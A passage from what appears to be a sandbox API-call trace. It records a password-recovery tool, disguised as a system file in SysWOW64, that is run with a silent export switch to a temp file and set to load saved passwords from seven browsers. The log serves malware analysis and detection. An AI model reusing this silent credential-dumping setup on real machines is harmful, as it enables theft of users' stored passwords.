(hModule=0x400000, lpName=0x70, lpType=0x5) returned 0x454708 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454708) returned 0xfa [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454708) returned 0x458dc8 [0251.457] LockResource (hResData=0x458dc8) returned 0x458dc8 [0251.457] FindResourceW (hModule=0x400000, lpName=0x448, lpType=0x5) returned 0x454718 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454718) returned 0x336 [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454718) returned 0x458ec4 [0251.457] LockResource (hResData=0x458ec4) returned 0x458ec4 [0251.457] EnumResourceNamesW (hModule=0x400000, lpType=0x6, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.457] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x6) returned 0x454728 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454728) returned 0x234 [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454728) returned 0x4591fc [0251.457] LockResource (hResData=0x4591fc) returned 0x4591fc [0251.457] FindResourceW (hModule=0x400000, lpName=0x20, lpType=0x6) returned 0x454738 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454738) returned 0x138 [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454738) returned 0x459430 [0251.457] LockResource (hResData=0x459430) returned 0x459430 [0251.457] FindResourceW (hModule=0x400000, lpName=0x23, lpType=0x6) returned 0x454748 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454748) returned 0x58 [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454748) returned 0x459568 [0251.457] LockResource (hResData=0x459568) returned 0x459568 [0251.457] FindResourceW (hModule=0x400000, lpName=0x26, lpType=0x6) returned 0x454758 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454758) returned 0xf6 [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454758) returned 0x4595c0 [0251.457] LockResource (hResData=0x4595c0) returned 0x4595c0 [0251.457] FindResourceW (hModule=0x400000, lpName=0x27, lpType=0x6) returned 0x454768 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454768) returned 0x96 [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454768) returned 0x4596b8 [0251.457] LockResource (hResData=0x4596b8) returned 0x4596b8 [0251.457] FindResourceW (hModule=0x400000, lpName=0x3f, lpType=0x6) returned 0x454778 [0251.457] SizeofResource (hModule=0x400000, hResInfo=0x454778) returned 0xba [0251.457] LoadResource (hModule=0x400000, hResInfo=0x454778) returned 0x459750 [0251.458] LockResource (hResData=0x459750) returned 0x459750 [0251.458] FindResourceW (hModule=0x400000, lpName=0x40, lpType=0x6) returned 0x454788 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x454788) returned 0x52 [0251.458] LoadResource (hModule=0x400000, hResInfo=0x454788) returned 0x45980c [0251.458] LockResource (hResData=0x45980c) returned 0x45980c [0251.458] FindResourceW (hModule=0x400000, lpName=0x52, lpType=0x6) returned 0x454798 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x454798) returned 0x68 [0251.458] LoadResource (hModule=0x400000, hResInfo=0x454798) returned 0x459860 [0251.458] LockResource (hResData=0x459860) returned 0x459860 [0251.458] EnumResourceNamesW (hModule=0x400000, lpType=0x9, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.458] FindResourceW (hModule=0x400000, lpName=0x67, lpType=0x9) returned 0x4547a8 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x4547a8) returned 0x48 [0251.458] LoadResource (hModule=0x400000, hResInfo=0x4547a8) returned 0x4598c8 [0251.458] LockResource (hResData=0x4598c8) returned 0x4598c8 [0251.458] EnumResourceNamesW (hModule=0x400000, lpType=0xc, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.458] FindResourceW (hModule=0x400000, lpName=0x67, lpType=0xc) returned 0x4547b8 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x4547b8) returned 0x14 [0251.458] LoadResource (hModule=0x400000, hResInfo=0x4547b8) returned 0x459910 [0251.458] LockResource (hResData=0x459910) returned 0x459910 [0251.458] EnumResourceNamesW (hModule=0x400000, lpType=0xe, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.458] FindResourceW (hModule=0x400000, lpName=0x65, lpType=0xe) returned 0x4547c8 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x4547c8) returned 0x14 [0251.458] LoadResource (hModule=0x400000, hResInfo=0x4547c8) returned 0x459924 [0251.458] LockResource (hResData=0x459924) returned 0x459924 [0251.458] FindResourceW (hModule=0x400000, lpName=0x6f, lpType=0xe) returned 0x4547d8 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x4547d8) returned 0x14 [0251.458] LoadResource (hModule=0x400000, hResInfo=0x4547d8) returned 0x459938 [0251.458] LockResource (hResData=0x459938) returned 0x459938 [0251.458] FindResourceW (hModule=0x400000, lpName=0x72, lpType=0xe) returned 0x4547e8 [0251.458] SizeofResource (hModule=0x400000, hResInfo=0x4547e8) returned 0x14 [0251.459] LoadResource (hModule=0x400000, hResInfo=0x4547e8) returned 0x45994c [0251.459] LockResource (hResData=0x45994c) returned 0x45994c [0251.459] FindResourceW (hModule=0x400000, lpName=0x73, lpType=0xe) returned 0x4547f8 [0251.459] SizeofResource (hModule=0x400000, hResInfo=0x4547f8) returned 0x14 [0251.459] LoadResource (hModule=0x400000, hResInfo=0x4547f8) returned 0x459960 [0251.459] LockResource (hResData=0x459960) returned 0x459960 [0251.459] FindResourceW (hModule=0x400000, lpName=0x74, lpType=0xe) returned 0x454808 [0251.459] SizeofResource (hModule=0x400000, hResInfo=0x454808) returned 0x14 [0251.459] LoadResource (hModule=0x400000, hResInfo=0x454808) returned 0x459974 [0251.459] LockResource (hResData=0x459974) returned 0x459974 [0251.459] FindResourceW (hModule=0x400000, lpName=0x75, lpType=0xe) returned 0x454818 [0251.459] SizeofResource (hModule=0x400000, hResInfo=0x454818) returned 0x14 [0251.459] LoadResource (hModule=0x400000, hResInfo=0x454818) returned 0x459988 [0251.459] LockResource (hResData=0x459988) returned 0x459988 [0251.459] FindResourceW (hModule=0x400000, lpName=0x76, lpType=0xe) returned 0x454828 [0251.459] SizeofResource (hModule=0x400000, hResInfo=0x454828) returned 0x14 [0251.459] LoadResource (hModule=0x400000, hResInfo=0x454828) returned 0x45999c [0251.459] LockResource (hResData=0x45999c) returned 0x45999c [0251.459] FindResourceW (hModule=0x400000, lpName=0x77, lpType=0xe) returned 0x454838 [0251.459] SizeofResource (hModule=0x400000, hResInfo=0x454838) returned 0x14 [0251.459] LoadResource (hModule=0x400000, hResInfo=0x454838) returned 0x4599b0 [0251.459] LockResource (hResData=0x4599b0) returned 0x4599b0 [0251.459] EnumResourceNamesW (hModule=0x400000, lpType=0x10, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.595] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x10) returned 0x454848 [0251.595] SizeofResource (hModule=0x400000, hResInfo=0x454848) returned 0x308 [0251.595] LoadResource (hModule=0x400000, hResInfo=0x454848) returned 0x4599c4 [0251.595] LockResource (hResData=0x4599c4) returned 0x4599c4 [0251.595] EnumResourceNamesW (hModule=0x400000, lpType=0x18, lpEnumFunc=0x4134ba, lParam=0x0) returned 1 [0251.595] FindResourceW (hModule=0x400000, lpName=0x1, lpType=0x18) returned 0x454858 [0251.595] SizeofResource (hModule=0x400000, hResInfo=0x454858) returned 0x445 [0251.595] LoadResource (hModule=0x400000, hResInfo=0x454858) returned 0x459ccc [0251.595] LockResource (hResData=0x459ccc) returned 0x459ccc [0251.596] wcscpy (in: _Dest=0x19f770, _Source="Arial" | out: _Dest="Arial") returned="Arial" [0251.596] CreateFontIndirectW (lplf=0x19f754) returned 0x50a01f1 [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="N", _Count=0x1 | out: _Dest="N") returned="N" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="i", _Count=0x1 | out: _Dest="Ni") returned="Ni" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="r", _Count=0x1 | out: _Dest="Nir") returned="Nir" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="S", _Count=0x1 | out: _Dest="NirS") returned="NirS" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="o", _Count=0x1 | out: _Dest="NirSo") returned="NirSo" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="f", _Count=0x1 | out: _Dest="NirSof") returned="NirSof" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="t", _Count=0x1 | out: _Dest="NirSoft") returned="NirSoft" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source=" ", _Count=0x1 | out: _Dest="NirSoft ") returned="NirSoft " [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="F", _Count=0x1 | out: _Dest="NirSoft F") returned="NirSoft F" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="r", _Count=0x1 | out: _Dest="NirSoft Fr") returned="NirSoft Fr" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="e", _Count=0x1 | out: _Dest="NirSoft Fre") returned="NirSoft Fre" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="e", _Count=0x1 | out: _Dest="NirSoft Free") returned="NirSoft Free" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freew") returned="NirSoft Freew" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="a", _Count=0x1 | out: _Dest="NirSoft Freewa") returned="NirSoft Freewa" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="r", _Count=0x1 | out: _Dest="NirSoft Freewar") returned="NirSoft Freewar" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="e", _Count=0x1 | out: _Dest="NirSoft Freeware") returned="NirSoft Freeware" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware.") returned="NirSoft Freeware." [0251.596] wcsncat (in: _Dest=0x19fcba, _Source=" ", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0251.596] wcsncat (in: _Dest=0x19fcba, _Source=" ", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="h", _Count=0x1 | out: _Dest="NirSoft Freeware. h") returned="NirSoft Freeware. h" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. ht") returned="NirSoft Freeware. ht" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. htt") returned="NirSoft Freeware. htt" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="p", _Count=0x1 | out: _Dest="NirSoft Freeware. http") returned="NirSoft Freeware. http" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source=":", _Count=0x1 | out: _Dest="NirSoft Freeware. http:") returned="NirSoft Freeware. http:" [0251.596] wcsncat (in: _Dest=0x19fcba, _Source="/", _Count=0x1 | out: _Dest="NirSoft Freeware. http:/") returned="NirSoft Freeware. http:/" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="/", _Count=0x1 | out: _Dest="NirSoft Freeware. http://") returned="NirSoft Freeware. http://" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://w") returned="NirSoft Freeware. http://w" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://ww") returned="NirSoft Freeware. http://ww" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="w", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www") returned="NirSoft Freeware. http://www" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.") returned="NirSoft Freeware. http://www." [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="n", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.n") returned="NirSoft Freeware. http://www.n" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="i", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.ni") returned="NirSoft Freeware. http://www.ni" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="r", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nir") returned="NirSoft Freeware. http://www.nir" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="s", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirs") returned="NirSoft Freeware. http://www.nirs" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="o", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirso") returned="NirSoft Freeware. http://www.nirso" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="f", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsof") returned="NirSoft Freeware. http://www.nirsof" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft") returned="NirSoft Freeware. http://www.nirsoft" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.") returned="NirSoft Freeware. http://www.nirsoft." [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="n", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.n") returned="NirSoft Freeware. http://www.nirsoft.n" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="e", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.ne") returned="NirSoft Freeware. http://www.nirsoft.ne" [0251.597] wcsncat (in: _Dest=0x19fcba, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.net") returned="NirSoft Freeware. http://www.nirsoft.net" [0251.597] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.597] LoadIconW (hInstance=0x400000, lpIconName=0x65) returned 0x20089 [0251.598] wcscpy (in: _Dest=0x19f834, _Source="WebBrowserPassView" | out: _Dest="WebBrowserPassView") returned="WebBrowserPassView" [0251.599] wcslen (_String="/scomma") returned 0x7 [0251.599] wcslen (_String="C:\\Windows\\TEMP\\2ECB.tmp") returned 0x18 [0251.599] _wcsicmp (_String1="/savelangfile", _String2="/scomma") returned -2 [0251.599] _wcsicmp (_String1="/savelangfile", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.599] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f5bc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0251.599] wcscat (in: _Dest=0x19f5bc, _Source="_lng.ini" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral_lng.ini") returned="C:\\Windows\\SysWOW64\\indexerneutral_lng.ini" [0251.599] GetFileAttributesW (lpFileName="C:\\Windows\\SysWOW64\\indexerneutral_lng.ini" (normalized: "c:\\windows\\syswow64\\indexerneutral_lng.ini")) returned 0xffffffff [0251.599] _wcsicmp (_String1="/deleteregkey", _String2="/scomma") returned -15 [0251.599] _wcsicmp (_String1="/deleteregkey", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.600] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.600] LoadStringW (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="URL") returned 0x3 [0251.600] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.600] LoadStringW (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="URL") returned 0x3 [0251.600] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.600] LoadStringW (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Web Browser") returned 0xb [0251.600] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.600] LoadStringW (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Web Browser") returned 0xb [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="User Name") returned 0x9 [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="User Name") returned 0x9 [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="User Name Field") returned 0xf [0251.601] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.601] LoadStringW (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="User Name Field") returned 0xf [0251.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.602] LoadStringW (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Password Field") returned 0xe [0251.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.602] LoadStringW (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Password Field") returned 0xe [0251.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.602] LoadStringW (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Created Time") returned 0xc [0251.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.602] LoadStringW (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Created Time") returned 0xc [0251.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.602] LoadStringW (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Modified Time") returned 0xd [0251.602] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0251.602] LoadStringW (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x744f90, cchBufferMax=4095 | out: lpBuffer="Modified Time") returned 0xd [0251.603] _wcsicmp (_String1="/stext", _String2="/scomma") returned 17 [0251.603] _wcsicmp (_String1="/shtml", _String2="/scomma") returned 5 [0251.603] _wcsicmp (_String1="/sverhtml", _String2="/scomma") returned 19 [0251.603] _wcsicmp (_String1="/sxml", _String2="/scomma") returned 21 [0251.603] _wcsicmp (_String1="/stab", _String2="/scomma") returned 17 [0251.603] _wcsicmp (_String1="/stabular", _String2="/scomma") returned 17 [0251.603] _wcsicmp (_String1="/scomma", _String2="/scomma") returned 0 [0251.603] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f594, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0251.603] wcscat (in: _Dest=0x19f594, _Source=".cfg" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned="C:\\Windows\\SysWOW64\\indexerneutral.cfg" [0251.604] wcscpy (in: _Dest=0x19f180, _Source="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned="C:\\Windows\\SysWOW64\\indexerneutral.cfg" [0251.604] wcscpy (in: _Dest=0x19f38a, _Source="General" | out: _Dest="General") returned="General" [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowGridLines", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="SaveFilterIndex", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowInfoTip", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="MarkOddEvenRows", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowTimeInGMT", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsIE", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.604] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsFirefox", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsChrome", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsOpera", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsSafari", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsSeaMonkey", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsYandex", nDefault=1, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x1 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseFirefoxProfileFolder", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.605] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseFirefoxInstallFolder", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.606] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseChromeProfileFolder", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.606] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseOperaPasswordFile", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.608] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="FirefoxProfileFolder", lpDefault="", lpReturnedString=0x742650, nSize=0x104, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0251.608] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="FirefoxInstallFolder", lpDefault="", lpReturnedString=0x74285a, nSize=0x104, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0251.609] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="ChromeProfileFolder", lpDefault="", lpReturnedString=0x742c68, nSize=0x104, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0251.609] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="OperaPasswordFile", lpDefault="", lpReturnedString=0x742e78, nSize=0x104, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0251.609] GetPrivateProfileIntW (lpAppName="General", lpKeyName="SaveFileEncoeding", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.609] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="WinPos", lpDefault="", lpReturnedString=0x19b12c, nSize=0x2000, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0251.609] wcslen (_String="") returned 0x0 [0251.609] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="Columns", lpDefault="", lpReturnedString=0x19b12c, nSize=0x2000, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0251.609] wcslen (_String="") returned 0x0 [0251.609] GetPrivateProfileIntW (lpAppName="General", lpKeyName="Sort", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0251.610] wcscat (in: _Dest=0x19f560, _Source="ShowGridLines" | out: _Dest="/ShowGridLines") returned="/ShowGridLines" [0251.610] _wcsicmp (_String1="/ShowGridLines", _String2="/scomma") returned 5 [0251.610] _wcsicmp (_String1="/ShowGridLines", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="SaveFilterIndex" | out: _Dest="/SaveFilterIndex") returned="/SaveFilterIndex" [0251.610] _wcsicmp (_String1="/SaveFilterIndex", _String2="/scomma") returned -2 [0251.610] _wcsicmp (_String1="/SaveFilterIndex", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="ShowInfoTip" | out: _Dest="/ShowInfoTip") returned="/ShowInfoTip" [0251.610] _wcsicmp (_String1="/ShowInfoTip", _String2="/scomma") returned 5 [0251.610] _wcsicmp (_String1="/ShowInfoTip", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="MarkOddEvenRows" | out: _Dest="/MarkOddEvenRows") returned="/MarkOddEvenRows" [0251.610] _wcsicmp (_String1="/MarkOddEvenRows", _String2="/scomma") returned -6 [0251.610] _wcsicmp (_String1="/MarkOddEvenRows", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="ShowTimeInGMT" | out: _Dest="/ShowTimeInGMT") returned="/ShowTimeInGMT" [0251.610] _wcsicmp (_String1="/ShowTimeInGMT", _String2="/scomma") returned 5 [0251.610] _wcsicmp (_String1="/ShowTimeInGMT", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="LoadPasswordsIE" | out: _Dest="/LoadPasswordsIE") returned="/LoadPasswordsIE" [0251.610] _wcsicmp (_String1="/LoadPasswordsIE", _String2="/scomma") returned -7 [0251.610] _wcsicmp (_String1="/LoadPasswordsIE", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="LoadPasswordsFirefox" | out: _Dest="/LoadPasswordsFirefox") returned="/LoadPasswordsFirefox" [0251.610] _wcsicmp (_String1="/LoadPasswordsFirefox", _String2="/scomma") returned -7 [0251.610] _wcsicmp (_String1="/LoadPasswordsFirefox", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="LoadPasswordsChrome" | out: _Dest="/LoadPasswordsChrome") returned="/LoadPasswordsChrome" [0251.610] _wcsicmp (_String1="/LoadPasswordsChrome", _String2="/scomma") returned -7 [0251.610] _wcsicmp (_String1="/LoadPasswordsChrome", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="LoadPasswordsOpera" | out: _Dest="/LoadPasswordsOpera") returned="/LoadPasswordsOpera" [0251.610] _wcsicmp (_String1="/LoadPasswordsOpera", _String2="/scomma") returned -7 [0251.610] _wcsicmp (_String1="/LoadPasswordsOpera", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.610] wcscat (in: _Dest=0x19f560, _Source="LoadPasswordsSafari" | out: _Dest="/LoadPasswordsSafari") returned="/LoadPasswordsSafari" [0251.611] _wcsicmp (_String1="/LoadPasswordsSafari", _String2="/scomma") returned -7 [0251.611] _wcsicmp (_String1="/LoadPasswordsSafari", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: _Dest=0x19f560, _Source="LoadPasswordsSeaMonkey" | out: _Dest="/LoadPasswordsSeaMonkey") returned="/LoadPasswordsSeaMonkey" [0251.611] _wcsicmp (_String1="/LoadPasswordsSeaMonkey", _String2="/scomma") returned -7 [0251.611] _wcsicmp (_String1="/LoadPasswordsSeaMonkey", _String2="C:\\Windows\\TEMP\\2ECB.tmp") returned -52 [0251.611] wcscat (in: 